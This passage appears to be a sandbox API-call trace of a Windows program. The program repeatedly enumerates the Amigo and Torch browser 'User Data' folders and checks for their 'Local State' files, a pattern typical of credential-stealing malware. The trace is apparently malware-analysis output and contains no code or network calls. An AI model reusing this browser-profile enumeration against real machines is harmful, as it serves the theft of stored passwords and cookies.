[0207.095] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.095] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.095] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.095] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.095] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.095] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.095] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.095] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.095] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.095] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.095] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.095] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.096] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.096] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.096] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.096] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.096] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.096] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.096] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.096] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.096] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.096] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.096] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.096] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.096] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.097] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.097] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.097] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.097] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.097] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.097] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.097] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.097] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.097] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.097] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.097] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.097] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.098] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.098] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.098] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.098] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.098] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.098] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.098] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.098] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.098] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.098] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.098] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.098] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.099] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.099] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.099] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.099] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.099] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.099] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.099] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.099] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.099] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.100] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.100] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.100] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.100] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.100] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Torch\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" [0207.100] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" [0207.100] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Local State" [0207.100] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torch\\user data\\local state")) returned 0xffffffff [0207.100] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*") returned 53 [0207.100] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x65, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.101] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.101] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.101] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.101] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, 